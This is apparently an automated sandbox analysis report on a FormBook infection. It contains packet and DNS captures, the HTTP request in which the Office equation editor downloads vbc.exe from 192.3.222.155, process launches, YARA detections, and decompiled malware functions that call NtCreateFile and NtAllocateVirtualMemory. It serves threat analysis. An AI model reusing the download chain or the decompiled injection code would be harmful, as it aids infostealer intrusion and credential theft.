                                Oct 13, 2021 17:05:26.817656994 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817668915 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817691088 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817693949 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817708015 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817722082 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817729950 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817754984 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817764997 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817783117 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817790031 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817807913 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817830086 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817833900 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817853928 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817859888 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817869902 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817884922 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.817892075 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817930937 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.817954063 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819107056 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819169998 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819211006 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819271088 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819283962 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819304943 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819310904 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819310904 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819317102 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819350958 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819384098 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819390059 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819403887 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819426060 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819442034 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819467068 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819494963 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819516897 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819539070 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819560051 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819569111 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819601059 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819631100 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819632053 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819660902 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819688082 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819710016 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819722891 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819729090 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819729090 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819758892 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819770098 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819788933 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819811106 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819823980 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819849968 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819880962 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819885969 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819917917 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819924116 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819947958 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.819967985 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.819981098 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820007086 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820035934 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820050001 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820071936 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820075989 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820111036 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820115089 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820135117 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820153952 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820171118 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820194960 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820202112 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820235968 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820266962 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820271969 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820305109 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820306063 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820327044 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820346117 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820374012 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820382118 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820409060 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820421934 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820456028 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820461988 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820489883 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820494890 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820528984 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820534945 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820563078 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820575953 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820583105 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820614100 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820636034 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820652008 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820683002 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820688963 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820720911 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820724010 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820741892 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820761919 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820785046 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820800066 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820817947 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820842028 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820866108 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820880890 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820899963 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820920944 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820943117 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.820961952 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820993900 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.820995092 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.821017027 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.821032047 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:27.178368092 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178371906 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178375006 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178378105 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178380966 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178384066 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178388119 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178390980 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178394079 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178396940 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178400993 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178406000 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178409100 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178411961 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178415060 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178419113 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178421021 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178425074 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178427935 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178431988 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178435087 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178438902 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178443909 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178447008 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178450108 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178452969 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178457022 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178459883 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178463936 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178467035 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178471088 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178474903 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178478956 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178483963 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178487062 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178491116 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178494930 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178497076 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178502083 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178503990 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178508043 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178512096 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178515911 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178519964 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178523064 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178527117 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178529978 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178534031 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178535938 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.178540945 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:27.352001905 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:27.352052927 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:27.352283001 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:28.552711964 CEST4916780192.168.2.22192.3.222.155

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 13, 2021 17:06:38.585946083 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                Oct 13, 2021 17:06:40.084522963 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                Oct 13, 2021 17:07:18.294235945 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                Oct 13, 2021 17:07:18.772310019 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
                                Oct 13, 2021 17:07:18.845947981 CEST | 59185 | 53 | 192.168.2.22 | 8.8.8.8
                                Oct 13, 2021 17:07:19.136692047 CEST | 55616 | 53 | 192.168.2.22 | 8.8.8.8

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Oct 13, 2021 17:06:38.585946083 CEST | 192.168.2.22 | 8.8.8.8 | 0x9487 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                Oct 13, 2021 17:06:40.084522963 CEST | 192.168.2.22 | 8.8.8.8 | 0x4a4c | Standard query (0) | hqpyda.bl.files.1drv.com | A (IP address) | IN (0x0001)
                                Oct 13, 2021 17:07:18.294235945 CEST | 192.168.2.22 | 8.8.8.8 | 0x1a95 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                Oct 13, 2021 17:07:18.772310019 CEST | 192.168.2.22 | 8.8.8.8 | 0x391f | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                Oct 13, 2021 17:07:18.845947981 CEST | 192.168.2.22 | 8.8.8.8 | 0xe966 | Standard query (0) | hqpyda.bl.files.1drv.com | A (IP address) | IN (0x0001)
                                Oct 13, 2021 17:07:19.136692047 CEST | 192.168.2.22 | 8.8.8.8 | 0xae43 | Standard query (0) | hqpyda.bl.files.1drv.com | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Oct 13, 2021 17:06:38.604048014 CEST | 8.8.8.8 | 192.168.2.22 | 0x9487 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:06:40.188663960 CEST | 8.8.8.8 | 192.168.2.22 | 0x4a4c | No error (0) | hqpyda.bl.files.1drv.com | bl-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:06:40.188663960 CEST | 8.8.8.8 | 192.168.2.22 | 0x4a4c | No error (0) | bl-files.fe.1drv.com | odc-bl-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:07:18.312407017 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a95 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:07:18.790204048 CEST | 8.8.8.8 | 192.168.2.22 | 0x391f | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:07:18.864113092 CEST | 8.8.8.8 | 192.168.2.22 | 0xe966 | No error (0) | hqpyda.bl.files.1drv.com | bl-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:07:18.864113092 CEST | 8.8.8.8 | 192.168.2.22 | 0xe966 | No error (0) | bl-files.fe.1drv.com | odc-bl-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:07:19.200906038 CEST | 8.8.8.8 | 192.168.2.22 | 0xae43 | No error (0) | hqpyda.bl.files.1drv.com | bl-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                Oct 13, 2021 17:07:19.200906038 CEST | 8.8.8.8 | 192.168.2.22 | 0xae43 | No error (0) | bl-files.fe.1drv.com | odc-bl-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • 192.3.222.155

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.22 | 49167 | 192.3.222.155 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

                                Timestamp | kBytes transferred | Direction | Data
                                Oct 13, 2021 17:05:25.235505104 CEST | 0 | OUT | GET /008008/vbc.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 192.3.222.155
                                Connection: Keep-Alive
                                Oct 13, 2021 17:05:25.411304951 CEST | 1 | IN | HTTP/1.1 200 OK
                                Date: Wed, 13 Oct 2021 15:05:26 GMT
                                Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
                                Last-Modified: Wed, 13 Oct 2021 09:47:27 GMT
                                ETag: "f7c00-5ce38d98ee1b4"
                                Accept-Ranges: bytes
                                Content-Length: 1014784
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/x-msdownload


                                System Behavior

                                General

                                Start time:17:04:22
                                Start date:13/10/2021
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                Imagebase:0x13fd70000
                                File size:28253536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Start time:17:04:43
                                Start date:13/10/2021
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                Imagebase:0x400000
                                File size:543304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:17:04:47
                                Start date:13/10/2021
                                Path:C:\Users\Public\vbc.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\Public\vbc.exe'
                                Imagebase:0x400000
                                File size:1014784 bytes
                                MD5 hash:A65B1815177EF9EBA7E5E894BBF65A3C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:low

                                General

                                Start time:17:06:04
                                Start date:13/10/2021
                                Path:C:\Windows\SysWOW64\DpiScaling.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\DpiScaling.exe
                                Imagebase:0x8b0000
                                File size:76800 bytes
                                MD5 hash:8C9DA2E414E713D3DAFF1F18223AE11B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                Reputation:moderate

                                General

                                Start time:17:06:06
                                Start date:13/10/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0xffa10000
                                File size:3229696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Start time:17:06:16
                                Start date:13/10/2021
                                Path:C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
                                Imagebase:0x400000
                                File size:1014784 bytes
                                MD5 hash:A65B1815177EF9EBA7E5E894BBF65A3C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:low

                                Disassembly

                                Code Analysis

                                  Executed Functions

                                  C-Code - Quality: 37%
                                  			E72498690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                  				void* _t18;
                                  				void* _t27;
                                  				intOrPtr* _t28;
                                  
                                  				_t13 = _a4;
                                  				_t28 = _a4 + 0xc48;
                                  				E724991E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                  				_t4 =  &_a40; // 0x72493a31
                                  				_t6 =  &_a32; // 0x72493d72
                                  				_t12 =  &_a8; // 0x72493d72
                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                  				return _t18;
                                  			}






                                  APIs
                                  • NtReadFile.NTDLL(r=Ir,5E972F65,FFFFFFFF,?,?,?,r=Ir,?,1:Ir,FFFFFFFF,5E972F65,72493D72,?,00000000), ref: 724986D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:Ir$r=Ir$r=Ir
                                  • API String ID: 2738559852-2263273510
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 1c9a813797a110df30d896115a6898fce3f7ef3a7775591708ad8987fb8e30e9
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 76F0A4B2200208ABDB14DF89DC85EEB77ADAF8C754F158248BA1D97251DA30E911CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E724985E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                  				long _t21;
                                  				void* _t31;
                                  
                                  				_t3 = _a4 + 0xc40; // 0xc40
                                  				E724991E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                  				return _t21;
                                  			}





                                  APIs
                                  • NtCreateFile.NTDLL(00000060,72488B13,?,72493BB7,72488B13,FFFFFFFF,?,?,FFFFFFFF,72488B13,72493BB7,?,72488B13,00000060,00000000,00000000), ref: 7249862D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 72989906d6faa31a56477962e88ce9834f1f47e7ada4a27c13a9cd90a45812bb
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: A5F0B2B2204208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E724987C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                  				long _t14;
                                  				void* _t21;
                                  
                                  				asm("in al, dx");
                                  				_t10 = _a4;
                                  				_t3 = _t10 + 0xc60; // 0xca0
                                  				E724991E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                  				return _t14;
                                  			}





                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,724993B4,?,00000000,?,00003000,00000040,00000000,00000000,72488B13), ref: 724987F9
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 544dd1ab3a78790940a0a6c9a03bd68e07458f6b4f113b0d90ccf5f0e00385cd
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 56F015B2200208ABDB14DF89CC85EAB77ADAF88750F118148FE0897241C630F910CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E724987C2() {
